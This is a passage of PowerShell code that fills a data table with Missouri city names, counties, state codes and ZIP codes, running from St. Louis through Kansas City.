$Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63112") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63113") + $null = $Cities.Rows.Add("Overland","St. Louis","Missouri","MO","29","63114") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63115") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63116") + $null = $Cities.Rows.Add("Richmond heights","St. Louis","Missouri","MO","29","63117") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63118") + $null = $Cities.Rows.Add("Webster groves","St. Louis","Missouri","MO","29","63119") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63120") + $null = $Cities.Rows.Add("Normandy","St. Louis","Missouri","MO","29","63121") + $null = $Cities.Rows.Add("Kirkwood","St. Louis","Missouri","MO","29","63122") + $null = $Cities.Rows.Add("Affton","St. Louis","Missouri","MO","29","63123") + $null = $Cities.Rows.Add("Ladue","St. Louis","Missouri","MO","29","63124") + $null = $Cities.Rows.Add("Lemay","St. Louis","Missouri","MO","29","63125") + $null = $Cities.Rows.Add("Sappington","St. Louis","Missouri","MO","29","63126") + $null = $Cities.Rows.Add("Sappington","St. Louis","Missouri","MO","29","63127") + $null = $Cities.Rows.Add("Sappington","St. Louis","Missouri","MO","29","63128") + $null = $Cities.Rows.Add("South county","St. Louis","Missouri","MO","29","63129") + $null = $Cities.Rows.Add("University city","St. Louis","Missouri","MO","29","63130") + $null = $Cities.Rows.Add("Des peres","St. Louis","Missouri","MO","29","63131") + $null = $Cities.Rows.Add("Olivette","St. Louis","Missouri","MO","29","63132") + $null = $Cities.Rows.Add("Saint louis","St. Louis","Missouri","MO","29","63133") + $null = $Cities.Rows.Add("Berkeley","St. Louis","Missouri","MO","29","63134") + $null = $Cities.Rows.Add("Ferguson","St. Louis","Missouri","MO","29","63135") + $null = $Cities.Rows.Add("Jennings","St. Louis","Missouri","MO","29","63136") + $null = $Cities.Rows.Add("North county","St. Louis","Missouri","MO","29","63137") + $null = $Cities.Rows.Add("North county","St. Louis","Missouri","MO","29","63138") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63139") + $null = $Cities.Rows.Add("Berkeley","St. Louis","Missouri","MO","29","63140") + $null = $Cities.Rows.Add("Creve coeur","St. Louis","Missouri","MO","29","63141") + $null = $Cities.Rows.Add("Maplewood","St. Louis","Missouri","MO","29","63143") + $null = $Cities.Rows.Add("Brentwood","St. Louis","Missouri","MO","29","63144") + $null = $Cities.Rows.Add("West county","St. Louis","Missouri","MO","29","63146") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63147") + $null = $Cities.Rows.Add("Zcta 631hh","St. Louis","Missouri","MO","29","631HH") + $null = $Cities.Rows.Add("Saint charles","St. Charles","Missouri","MO","29","63301") + $null = $Cities.Rows.Add("Saint charles","St. Charles","Missouri","MO","29","63303") + $null = $Cities.Rows.Add("Saint charles","St. Charles","Missouri","MO","29","63304") + $null = $Cities.Rows.Add("Annada","Pike","Missouri","MO","29","63330") + $null = $Cities.Rows.Add("Augusta","St. Charles","Missouri","MO","29","63332") + $null = $Cities.Rows.Add("Bellflower","Montgomery","Missouri","MO","29","63333") + $null = $Cities.Rows.Add("Bowling green","Pike","Missouri","MO","29","63334") + $null = $Cities.Rows.Add("Clarksville","Pike","Missouri","MO","29","63336") + $null = $Cities.Rows.Add("Curryville","Pike","Missouri","MO","29","63339") + $null = $Cities.Rows.Add("Defiance","St. Charles","Missouri","MO","29","63341") + $null = $Cities.Rows.Add("Elsberry","Lincoln","Missouri","MO","29","63343") + $null = $Cities.Rows.Add("Eolia","Pike","Missouri","MO","29","63344") + $null = $Cities.Rows.Add("Farber","Audrain","Missouri","MO","29","63345") + $null = $Cities.Rows.Add("Foley","Lincoln","Missouri","MO","29","63347") + $null = $Cities.Rows.Add("Foristell","St. Charles","Missouri","MO","29","63348") + $null = $Cities.Rows.Add("Hawk point","Lincoln","Missouri","MO","29","63349") + $null = $Cities.Rows.Add("High hill","Montgomery","Missouri","MO","29","63350") + $null = $Cities.Rows.Add("Jonesburg","Montgomery","Missouri","MO","29","63351") + $null = $Cities.Rows.Add("Laddonia","Audrain","Missouri","MO","29","63352") + $null = $Cities.Rows.Add("Louisiana","Pike","Missouri","MO","29","63353") + $null = $Cities.Rows.Add("Lake sherwood","Warren","Missouri","MO","29","63357") + $null = $Cities.Rows.Add("Middletown","Montgomery","Missouri","MO","29","63359") + $null = $Cities.Rows.Add("Montgomery city","Montgomery","Missouri","MO","29","63361") + $null = $Cities.Rows.Add("Moscow mills","Lincoln","Missouri","MO","29","63362") + $null = $Cities.Rows.Add("New florence","Montgomery","Missouri","MO","29","63363") + $null = $Cities.Rows.Add("Saint paul","St. Charles","Missouri","MO","29","63366") + $null = $Cities.Rows.Add("Lake saint louis","St. Charles","Missouri","MO","29","63367") + $null = $Cities.Rows.Add("Old monroe","Lincoln","Missouri","MO","29","63369") + $null = $Cities.Rows.Add("Olney","Lincoln","Missouri","MO","29","63370") + $null = $Cities.Rows.Add("Portage des siou","St. Charles","Missouri","MO","29","63373") + $null = $Cities.Rows.Add("Saint peters","St. Charles","Missouri","MO","29","63376") + $null = $Cities.Rows.Add("Silex","Lincoln","Missouri","MO","29","63377") + $null = $Cities.Rows.Add("Troy","Lincoln","Missouri","MO","29","63379") + $null = $Cities.Rows.Add("Truxton","Lincoln","Missouri","MO","29","63381") + $null = $Cities.Rows.Add("Vandalia","Audrain","Missouri","MO","29","63382") + $null = $Cities.Rows.Add("Warrenton","Warren","Missouri","MO","29","63383") + $null = $Cities.Rows.Add("Wellsville","Montgomery","Missouri","MO","29","63384") + $null = $Cities.Rows.Add("Wentzville","St. Charles","Missouri","MO","29","63385") + $null = $Cities.Rows.Add("West alton","St. Charles","Missouri","MO","29","63386") + $null = $Cities.Rows.Add("Whiteside","Lincoln","Missouri","MO","29","63387") + $null = $Cities.Rows.Add("Williamsburg","Callaway","Missouri","MO","29","63388") + $null = $Cities.Rows.Add("Winfield","Lincoln","Missouri","MO","29","63389") + $null = $Cities.Rows.Add("Wright city","Warren","Missouri","MO","29","63390") + $null = $Cities.Rows.Add("Zcta 633hh","Lincoln","Missouri","MO","29","633HH") + $null = $Cities.Rows.Add("Hannibal","Marion","Missouri","MO","29","63401") + $null = $Cities.Rows.Add("Alexandria","Clark","Missouri","MO","29","63430") + $null = $Cities.Rows.Add("Anabel","Macon","Missouri","MO","29","63431") + $null = $Cities.Rows.Add("Arbela","Scotland","Missouri","MO","29","63432") + $null = $Cities.Rows.Add("Ashburn","Pike","Missouri","MO","29","63433") + $null = $Cities.Rows.Add("Bethel","Shelby","Missouri","MO","29","63434") + $null = $Cities.Rows.Add("Canton","Lewis","Missouri","MO","29","63435") + $null = $Cities.Rows.Add("Center","Ralls","Missouri","MO","29","63436") + $null = $Cities.Rows.Add("Clarence","Shelby","Missouri","MO","29","63437") + $null = $Cities.Rows.Add("Durham","Lewis","Missouri","MO","29","63438") + $null = $Cities.Rows.Add("Emden","Shelby","Missouri","MO","29","63439") + $null = $Cities.Rows.Add("Ewing","Lewis","Missouri","MO","29","63440") + $null = $Cities.Rows.Add("Frankford","Pike","Missouri","MO","29","63441") + $null = $Cities.Rows.Add("Hunnewell","Shelby","Missouri","MO","29","63443") + $null = $Cities.Rows.Add("Kahoka","Clark","Missouri","MO","29","63445") + $null = $Cities.Rows.Add("Knox city","Knox","Missouri","MO","29","63446") + $null = $Cities.Rows.Add("La belle","Lewis","Missouri","MO","29","63447") + $null = $Cities.Rows.Add("La grange","Lewis","Missouri","MO","29","63448") + $null = $Cities.Rows.Add("Lentner","Shelby","Missouri","MO","29","63450") + $null = $Cities.Rows.Add("Leonard","Shelby","Missouri","MO","29","63451") + $null = $Cities.Rows.Add("Lewistown","Lewis","Missouri","MO","29","63452") + $null = $Cities.Rows.Add("Luray","Clark","Missouri","MO","29","63453") + $null = $Cities.Rows.Add("Maywood","Marion","Missouri","MO","29","63454") + $null = $Cities.Rows.Add("Monroe city","Monroe","Missouri","MO","29","63456") + $null = $Cities.Rows.Add("Monticello","Lewis","Missouri","MO","29","63457") + $null = $Cities.Rows.Add("Newark","Knox","Missouri","MO","29","63458") + $null = $Cities.Rows.Add("New london","Ralls","Missouri","MO","29","63459") + $null = $Cities.Rows.Add("Novelty","Knox","Missouri","MO","29","63460") + $null = $Cities.Rows.Add("Palmyra","Marion","Missouri","MO","29","63461") + $null = $Cities.Rows.Add("Perry","Ralls","Missouri","MO","29","63462") + $null = $Cities.Rows.Add("Philadelphia","Marion","Missouri","MO","29","63463") + $null = $Cities.Rows.Add("Plevna","Knox","Missouri","MO","29","63464") + $null = $Cities.Rows.Add("Revere","Clark","Missouri","MO","29","63465") + $null = $Cities.Rows.Add("Shelbina","Shelby","Missouri","MO","29","63468") + $null = $Cities.Rows.Add("Shelbyville","Shelby","Missouri","MO","29","63469") + $null = $Cities.Rows.Add("Taylor","Marion","Missouri","MO","29","63471") + $null = $Cities.Rows.Add("Wayland","Clark","Missouri","MO","29","63472") + $null = $Cities.Rows.Add("Williamstown","Lewis","Missouri","MO","29","63473") + $null = $Cities.Rows.Add("Wyaconda","Clark","Missouri","MO","29","63474") + $null = $Cities.Rows.Add("Zcta 634hh","Clark","Missouri","MO","29","634HH") + $null = $Cities.Rows.Add("Kirksville","Adair","Missouri","MO","29","63501") + $null = $Cities.Rows.Add("Atlanta","Macon","Missouri","MO","29","63530") + $null = $Cities.Rows.Add("Baring","Knox","Missouri","MO","29","63531") + $null = $Cities.Rows.Add("Bevier","Macon","Missouri","MO","29","63532") + $null = $Cities.Rows.Add("Brashear","Adair","Missouri","MO","29","63533") + $null = $Cities.Rows.Add("Callao","Macon","Missouri","MO","29","63534") + $null = $Cities.Rows.Add("Coatsville","Schuyler","Missouri","MO","29","63535") + $null = $Cities.Rows.Add("Downing","Schuyler","Missouri","MO","29","63536") + $null = $Cities.Rows.Add("Edina","Knox","Missouri","MO","29","63537") + $null = $Cities.Rows.Add("Elmer","Macon","Missouri","MO","29","63538") + $null = $Cities.Rows.Add("Ethel","Macon","Missouri","MO","29","63539") + $null = $Cities.Rows.Add("Gibbs","Adair","Missouri","MO","29","63540") + $null = $Cities.Rows.Add("Glenwood","Schuyler","Missouri","MO","29","63541") + $null = $Cities.Rows.Add("Gorin","Scotland","Missouri","MO","29","63543") + $null = $Cities.Rows.Add("Green castle","Sullivan","Missouri","MO","29","63544") + $null = $Cities.Rows.Add("Green city","Sullivan","Missouri","MO","29","63545") + $null = $Cities.Rows.Add("Greentop","Adair","Missouri","MO","29","63546") + $null = $Cities.Rows.Add("Hurdland","Knox","Missouri","MO","29","63547") + $null = $Cities.Rows.Add("Lancaster","Schuyler","Missouri","MO","29","63548") + $null = $Cities.Rows.Add("La plata","Macon","Missouri","MO","29","63549") + $null = $Cities.Rows.Add("Livonia","Putnam","Missouri","MO","29","63551") + $null = $Cities.Rows.Add("Macon","Macon","Missouri","MO","29","63552") + $null = $Cities.Rows.Add("Memphis","Scotland","Missouri","MO","29","63555") + $null = $Cities.Rows.Add("Milan","Sullivan","Missouri","MO","29","63556") + $null = $Cities.Rows.Add("New boston","Linn","Missouri","MO","29","63557") + $null = $Cities.Rows.Add("New cambria","Macon","Missouri","MO","29","63558") + $null = $Cities.Rows.Add("Novinger","Adair","Missouri","MO","29","63559") + $null = $Cities.Rows.Add("Pollock","Sullivan","Missouri","MO","29","63560") + $null = $Cities.Rows.Add("Queen city","Schuyler","Missouri","MO","29","63561") + $null = $Cities.Rows.Add("Rutledge","Scotland","Missouri","MO","29","63563") + $null = $Cities.Rows.Add("Unionville","Putnam","Missouri","MO","29","63565") + $null = $Cities.Rows.Add("Winigan","Linn","Missouri","MO","29","63566") + $null = $Cities.Rows.Add("Worthington","Putnam","Missouri","MO","29","63567") + $null = $Cities.Rows.Add("Zcta 635hh","Chariton","Missouri","MO","29","635HH") + $null = $Cities.Rows.Add("Desloge","St. Francois","Missouri","MO","29","63601") + $null = $Cities.Rows.Add("Annapolis","Iron","Missouri","MO","29","63620") + $null = $Cities.Rows.Add("Arcadia","Iron","Missouri","MO","29","63621") + $null = $Cities.Rows.Add("Belgrade","Washington","Missouri","MO","29","63622") + $null = $Cities.Rows.Add("Belleview","Iron","Missouri","MO","29","63623") + $null = $Cities.Rows.Add("Desloge","St. Francois","Missouri","MO","29","63624") + $null = $Cities.Rows.Add("Black","Reynolds","Missouri","MO","29","63625") + $null = $Cities.Rows.Add("Blackwell","St. Francois","Missouri","MO","29","63626") + $null = $Cities.Rows.Add("Bloomsdale","Ste. Genevieve","Missouri","MO","29","63627") + $null = $Cities.Rows.Add("Bonne terre","St. Francois","Missouri","MO","29","63628") + $null = $Cities.Rows.Add("Bunker","Reynolds","Missouri","MO","29","63629") + $null = $Cities.Rows.Add("Cadet","Washington","Missouri","MO","29","63630") + $null = $Cities.Rows.Add("Caledonia","Washington","Missouri","MO","29","63631") + $null = $Cities.Rows.Add("Centerville","Reynolds","Missouri","MO","29","63633") + $null = $Cities.Rows.Add("Des arc","Iron","Missouri","MO","29","63636") + $null = $Cities.Rows.Add("Doe run","St. Francois","Missouri","MO","29","63637") + $null = $Cities.Rows.Add("Ellington","Reynolds","Missouri","MO","29","63638") + $null = $Cities.Rows.Add("Farmington","St. Francois","Missouri","MO","29","63640") + $null = $Cities.Rows.Add("Millcreek","Madison","Missouri","MO","29","63645") + $null = $Cities.Rows.Add("Irondale","Washington","Missouri","MO","29","63648") + $null = $Cities.Rows.Add("Iron mountain","Iron","Missouri","MO","29","63650") + $null = $Cities.Rows.Add("Leadwood","St. Francois","Missouri","MO","29","63653") + $null = $Cities.Rows.Add("Lesterville","Reynolds","Missouri","MO","29","63654") + $null = $Cities.Rows.Add("Marquand","Madison","Missouri","MO","29","63655") + $null = $Cities.Rows.Add("Middle brook","Iron","Missouri","MO","29","63656") + $null = $Cities.Rows.Add("Mineral point","Washington","Missouri","MO","29","63660") + $null = $Cities.Rows.Add("Patton","Bollinger","Missouri","MO","29","63662") + $null = $Cities.Rows.Add("Pilot knob","Iron","Missouri","MO","29","63663") + $null = $Cities.Rows.Add("Potosi","Washington","Missouri","MO","29","63664") + $null = $Cities.Rows.Add("Redford","Reynolds","Missouri","MO","29","63665") + $null = $Cities.Rows.Add("Lake forest esta","Ste. Genevieve","Missouri","MO","29","63670") + $null = $Cities.Rows.Add("Saint mary","Ste. Genevieve","Missouri","MO","29","63673") + $null = $Cities.Rows.Add("Tiff","Washington","Missouri","MO","29","63674") + $null = $Cities.Rows.Add("Vulcan","Iron","Missouri","MO","29","63675") + $null = $Cities.Rows.Add("Zcta 636hh","Ste. Genevieve","Missouri","MO","29","636HH") + $null = $Cities.Rows.Add("Cape girardeau","Cape Girardeau","Missouri","MO","29","63701") + $null = $Cities.Rows.Add("Zcta 63703","Cape Girardeau","Missouri","MO","29","63703") + $null = $Cities.Rows.Add("Advance","Stoddard","Missouri","MO","29","63730") + $null = $Cities.Rows.Add("New wells","Perry","Missouri","MO","29","63732") + $null = $Cities.Rows.Add("Bell city","Stoddard","Missouri","MO","29","63735") + $null = $Cities.Rows.Add("Benton","Scott","Missouri","MO","29","63736") + $null = $Cities.Rows.Add("Brownwood","Stoddard","Missouri","MO","29","63738") + $null = $Cities.Rows.Add("Burfordville","Cape Girardeau","Missouri","MO","29","63739") + $null = $Cities.Rows.Add("Chaffee","Scott","Missouri","MO","29","63740") + $null = $Cities.Rows.Add("Commerce","Scott","Missouri","MO","29","63742") + $null = $Cities.Rows.Add("Daisy","Cape Girardeau","Missouri","MO","29","63743") + $null = $Cities.Rows.Add("Friedheim","Cape Girardeau","Missouri","MO","29","63747") + $null = $Cities.Rows.Add("Frohna","Perry","Missouri","MO","29","63748") + $null = $Cities.Rows.Add("Gipsy","Bollinger","Missouri","MO","29","63750") + $null = $Cities.Rows.Add("Glenallen","Bollinger","Missouri","MO","29","63751") + $null = $Cities.Rows.Add("Grassy","Bollinger","Missouri","MO","29","63753") + $null = $Cities.Rows.Add("Jackson","Cape Girardeau","Missouri","MO","29","63755") + $null = $Cities.Rows.Add("Kelso","Scott","Missouri","MO","29","63758") + $null = $Cities.Rows.Add("Leopold","Bollinger","Missouri","MO","29","63760") + $null = $Cities.Rows.Add("Mc gee","Wayne","Missouri","MO","29","63763") + $null = $Cities.Rows.Add("Scopus","Bollinger","Missouri","MO","29","63764") + $null = $Cities.Rows.Add("Millersville","Cape Girardeau","Missouri","MO","29","63766") + $null = $Cities.Rows.Add("Morley","Scott","Missouri","MO","29","63767") + $null = $Cities.Rows.Add("Oak ridge","Cape Girardeau","Missouri","MO","29","63769") + $null = $Cities.Rows.Add("Old appleton","Cape Girardeau","Missouri","MO","29","63770") + $null = $Cities.Rows.Add("Oran","Scott","Missouri","MO","29","63771") + $null = $Cities.Rows.Add("Perkins","Scott","Missouri","MO","29","63774") + $null = $Cities.Rows.Add("Perryville","Perry","Missouri","MO","29","63775") + $null = $Cities.Rows.Add("Scott city","Scott","Missouri","MO","29","63780") + $null = $Cities.Rows.Add("Sedgewickville","Bollinger","Missouri","MO","29","63781") + $null = $Cities.Rows.Add("Sturdivant","Bollinger","Missouri","MO","29","63782") + $null = $Cities.Rows.Add("Uniontown","Perry","Missouri","MO","29","63783") + $null = $Cities.Rows.Add("Vanduser","Scott","Missouri","MO","29","63784") + $null = $Cities.Rows.Add("Whitewater","Cape Girardeau","Missouri","MO","29","63785") + $null = $Cities.Rows.Add("Zalma","Bollinger","Missouri","MO","29","63787") + $null = $Cities.Rows.Add("Zcta 637hh","Cape Girardeau","Missouri","MO","29","637HH") + $null = $Cities.Rows.Add("Sikeston","Scott","Missouri","MO","29","63801") + $null = $Cities.Rows.Add("Anniston","Mississippi","Missouri","MO","29","63820") + $null = $Cities.Rows.Add("Arbyrd","Dunklin","Missouri","MO","29","63821") + $null = $Cities.Rows.Add("Bernie","Stoddard","Missouri","MO","29","63822") + $null = $Cities.Rows.Add("Bertrand","Mississippi","Missouri","MO","29","63823") + $null = $Cities.Rows.Add("Blodgett","Scott","Missouri","MO","29","63824") + $null = $Cities.Rows.Add("Bloomfield","Stoddard","Missouri","MO","29","63825") + $null = $Cities.Rows.Add("Braggadocio","Pemiscot","Missouri","MO","29","63826") + $null = $Cities.Rows.Add("Bragg city","Pemiscot","Missouri","MO","29","63827") + $null = $Cities.Rows.Add("Canalou","New Madrid","Missouri","MO","29","63828") + $null = $Cities.Rows.Add("Cardwell","Dunklin","Missouri","MO","29","63829") + $null = $Cities.Rows.Add("Caruthersville","Pemiscot","Missouri","MO","29","63830") + $null = $Cities.Rows.Add("Catron","New Madrid","Missouri","MO","29","63833") + $null = $Cities.Rows.Add("Charleston","Mississippi","Missouri","MO","29","63834") + $null = $Cities.Rows.Add("Clarkton","Dunklin","Missouri","MO","29","63837") + $null = $Cities.Rows.Add("Cooter","Pemiscot","Missouri","MO","29","63839") + $null = $Cities.Rows.Add("Dexter","Stoddard","Missouri","MO","29","63841") + $null = $Cities.Rows.Add("East prairie","Mississippi","Missouri","MO","29","63845") + $null = $Cities.Rows.Add("Essex","Stoddard","Missouri","MO","29","63846") + $null = $Cities.Rows.Add("Gibson","Dunklin","Missouri","MO","29","63847") + $null = $Cities.Rows.Add("Gideon","New Madrid","Missouri","MO","29","63848") + $null = $Cities.Rows.Add("Gobler","Dunklin","Missouri","MO","29","63849") + $null = $Cities.Rows.Add("Grayridge","Stoddard","Missouri","MO","29","63850") + $null = $Cities.Rows.Add("Hayti heights","Pemiscot","Missouri","MO","29","63851") + $null = $Cities.Rows.Add("Holcomb","Dunklin","Missouri","MO","29","63852") + $null = $Cities.Rows.Add("Holland","Pemiscot","Missouri","MO","29","63853") + $null = $Cities.Rows.Add("Hornersville","Dunklin","Missouri","MO","29","63855") + $null = $Cities.Rows.Add("Kennett","Dunklin","Missouri","MO","29","63857") + $null = $Cities.Rows.Add("Kewanee","New Madrid","Missouri","MO","29","63860") + $null = $Cities.Rows.Add("Lilbourn","New Madrid","Missouri","MO","29","63862") + $null = $Cities.Rows.Add("Malden","Dunklin","Missouri","MO","29","63863") + $null = $Cities.Rows.Add("Marston","New Madrid","Missouri","MO","29","63866") + $null = $Cities.Rows.Add("Matthews","New Madrid","Missouri","MO","29","63867") + $null = $Cities.Rows.Add("Morehouse","New Madrid","Missouri","MO","29","63868") + $null = $Cities.Rows.Add("New madrid","New Madrid","Missouri","MO","29","63869") + $null = $Cities.Rows.Add("Parma","New Madrid","Missouri","MO","29","63870") + $null = $Cities.Rows.Add("Portageville","New Madrid","Missouri","MO","29","63873") + $null = $Cities.Rows.Add("Risco","New Madrid","Missouri","MO","29","63874") + $null = $Cities.Rows.Add("Senath","Dunklin","Missouri","MO","29","63876") + $null = $Cities.Rows.Add("Steele","Pemiscot","Missouri","MO","29","63877") + $null = $Cities.Rows.Add("Tallapoosa","New Madrid","Missouri","MO","29","63878") + $null = $Cities.Rows.Add("Homestown","Pemiscot","Missouri","MO","29","63879") + $null = $Cities.Rows.Add("Whiteoak","Dunklin","Missouri","MO","29","63880") + $null = $Cities.Rows.Add("Wyatt","Mississippi","Missouri","MO","29","63882") + $null = $Cities.Rows.Add("Zcta 638hh","Mississippi","Missouri","MO","29","638HH") + $null = $Cities.Rows.Add("Poplar bluff","Butler","Missouri","MO","29","63901") + $null = $Cities.Rows.Add("Broseley","Butler","Missouri","MO","29","63932") + $null = $Cities.Rows.Add("Campbell","Dunklin","Missouri","MO","29","63933") + $null = $Cities.Rows.Add("Clubb","Wayne","Missouri","MO","29","63934") + $null = $Cities.Rows.Add("Poynor","Ripley","Missouri","MO","29","63935") + $null = $Cities.Rows.Add("Dudley","Stoddard","Missouri","MO","29","63936") + $null = $Cities.Rows.Add("Ellsinore","Carter","Missouri","MO","29","63937") + $null = $Cities.Rows.Add("Fagus","Butler","Missouri","MO","29","63938") + $null = $Cities.Rows.Add("Fairdealing","Ripley","Missouri","MO","29","63939") + $null = $Cities.Rows.Add("Fisk","Butler","Missouri","MO","29","63940") + $null = $Cities.Rows.Add("Fremont","Carter","Missouri","MO","29","63941") + $null = $Cities.Rows.Add("Gatewood","Ripley","Missouri","MO","29","63942") + $null = $Cities.Rows.Add("Grandin","Carter","Missouri","MO","29","63943") + $null = $Cities.Rows.Add("Greenville","Wayne","Missouri","MO","29","63944") + $null = $Cities.Rows.Add("Harviell","Butler","Missouri","MO","29","63945") + $null = $Cities.Rows.Add("Hiram","Wayne","Missouri","MO","29","63947") + $null = $Cities.Rows.Add("Lowndes","Wayne","Missouri","MO","29","63951") + $null = $Cities.Rows.Add("Mill spring","Wayne","Missouri","MO","29","63952") + $null = $Cities.Rows.Add("Naylor","Ripley","Missouri","MO","29","63953") + $null = $Cities.Rows.Add("Neelyville","Butler","Missouri","MO","29","63954") + $null = $Cities.Rows.Add("Oxly","Ripley","Missouri","MO","29","63955") + $null = $Cities.Rows.Add("Patterson","Wayne","Missouri","MO","29","63956") + $null = $Cities.Rows.Add("Piedmont","Wayne","Missouri","MO","29","63957") + $null = $Cities.Rows.Add("Puxico","Stoddard","Missouri","MO","29","63960") + $null = $Cities.Rows.Add("Qulin","Butler","Missouri","MO","29","63961") + $null = $Cities.Rows.Add("Shook","Wayne","Missouri","MO","29","63963") + $null = $Cities.Rows.Add("Silva","Wayne","Missouri","MO","29","63964") + $null = $Cities.Rows.Add("Van buren","Carter","Missouri","MO","29","63965") + $null = $Cities.Rows.Add("Wappapello","Wayne","Missouri","MO","29","63966") + $null = $Cities.Rows.Add("Williamsville","Wayne","Missouri","MO","29","63967") + $null = $Cities.Rows.Add("Zcta 639hh","Reynolds","Missouri","MO","29","639HH") + $null = $Cities.Rows.Add("Alma","Lafayette","Missouri","MO","29","64001") + $null = $Cities.Rows.Add("Bates city","Lafayette","Missouri","MO","29","64011") + $null = $Cities.Rows.Add("Belton","Cass","Missouri","MO","29","64012") + $null = $Cities.Rows.Add("Blue springs","Jackson","Missouri","MO","29","64014") + $null = $Cities.Rows.Add("Lake tapawingo","Jackson","Missouri","MO","29","64015") + $null = $Cities.Rows.Add("Buckner","Jackson","Missouri","MO","29","64016") + $null = $Cities.Rows.Add("Camden","Ray","Missouri","MO","29","64017") + $null = $Cities.Rows.Add("Camden point","Platte","Missouri","MO","29","64018") + $null = $Cities.Rows.Add("Centerview","Johnson","Missouri","MO","29","64019") + $null = $Cities.Rows.Add("Concordia","Lafayette","Missouri","MO","29","64020") + $null = $Cities.Rows.Add("Corder","Lafayette","Missouri","MO","29","64021") + $null = $Cities.Rows.Add("Dover","Lafayette","Missouri","MO","29","64022") + $null = $Cities.Rows.Add("Excelsior spring","Clay","Missouri","MO","29","64024") + $null = $Cities.Rows.Add("Grain valley","Jackson","Missouri","MO","29","64029") + $null = $Cities.Rows.Add("Grandview","Jackson","Missouri","MO","29","64030") + $null = $Cities.Rows.Add("Lake winnebago","Jackson","Missouri","MO","29","64034") + $null = $Cities.Rows.Add("Hardin","Ray","Missouri","MO","29","64035") + $null = $Cities.Rows.Add("Henrietta","Ray","Missouri","MO","29","64036") + $null = $Cities.Rows.Add("Higginsville","Lafayette","Missouri","MO","29","64037") + $null = $Cities.Rows.Add("Holden","Johnson","Missouri","MO","29","64040") + $null = $Cities.Rows.Add("Holt","Clay","Missouri","MO","29","64048") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64050") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64052") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64053") + $null = $Cities.Rows.Add("Sugar creek","Jackson","Missouri","MO","29","64054") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64055") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64056") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64057") + $null = $Cities.Rows.Add("Independence","Jackson","Missouri","MO","29","64058") + $null = $Cities.Rows.Add("Kearney","Clay","Missouri","MO","29","64060") + $null = $Cities.Rows.Add("Kingsville","Johnson","Missouri","MO","29","64061") + $null = $Cities.Rows.Add("Lawson","Ray","Missouri","MO","29","64062") + $null = $Cities.Rows.Add("Lake lotawana","Jackson","Missouri","MO","29","64063") + $null = $Cities.Rows.Add("Lees summit","Jackson","Missouri","MO","29","64064") + $null = $Cities.Rows.Add("Levasy","Jackson","Missouri","MO","29","64066") + $null = $Cities.Rows.Add("Lexington","Lafayette","Missouri","MO","29","64067") + $null = $Cities.Rows.Add("Pleasant valley","Clay","Missouri","MO","29","64068") + $null = $Cities.Rows.Add("Lone jack","Jackson","Missouri","MO","29","64070") + $null = $Cities.Rows.Add("Mayview","Lafayette","Missouri","MO","29","64071") + $null = $Cities.Rows.Add("Missouri city","Clay","Missouri","MO","29","64072") + $null = $Cities.Rows.Add("Napoleon","Lafayette","Missouri","MO","29","64074") + $null = $Cities.Rows.Add("Oak grove","Jackson","Missouri","MO","29","64075") + $null = $Cities.Rows.Add("Odessa","Lafayette","Missouri","MO","29","64076") + $null = $Cities.Rows.Add("Orrick","Ray","Missouri","MO","29","64077") + $null = $Cities.Rows.Add("Peculiar","Cass","Missouri","MO","29","64078") + $null = $Cities.Rows.Add("Platte city","Platte","Missouri","MO","29","64079") + $null = $Cities.Rows.Add("Pleasant hill","Cass","Missouri","MO","29","64080") + $null = $Cities.Rows.Add("Lees summit","Jackson","Missouri","MO","29","64081") + $null = $Cities.Rows.Add("Lees summit","Jackson","Missouri","MO","29","64082") + $null = $Cities.Rows.Add("Raymore","Cass","Missouri","MO","29","64083") + $null = $Cities.Rows.Add("Rayville","Ray","Missouri","MO","29","64084") + $null = $Cities.Rows.Add("Richmond","Ray","Missouri","MO","29","64085") + $null = $Cities.Rows.Add("Lees summit","Jackson","Missouri","MO","29","64086") + $null = $Cities.Rows.Add("Sibley","Jackson","Missouri","MO","29","64088") + $null = $Cities.Rows.Add("Smithville","Clay","Missouri","MO","29","64089") + $null = $Cities.Rows.Add("Strasburg","Cass","Missouri","MO","29","64090") + $null = $Cities.Rows.Add("Warrensburg","Johnson","Missouri","MO","29","64093") + $null = $Cities.Rows.Add("Waverly","Lafayette","Missouri","MO","29","64096") + $null = $Cities.Rows.Add("Wellington","Lafayette","Missouri","MO","29","64097") + $null = $Cities.Rows.Add("Weston","Platte","Missouri","MO","29","64098") + $null = $Cities.Rows.Add("Zcta 640hh","Clay","Missouri","MO","29","640HH") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64101") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64102") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64105") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64106") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64108") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64109") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64110") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64111") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64112") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64113") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64114") + $null = $Cities.Rows.Add("North kansas cit","Clay","Missouri","MO","29","64116") + $null = $Cities.Rows.Add("Randolph","Clay","Missouri","MO","29","64117") + $null = $Cities.Rows.Add("Gladstone","Clay","Missouri","MO","29","64118") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64119") + $null = $Cities.Rows.Add("Kansas 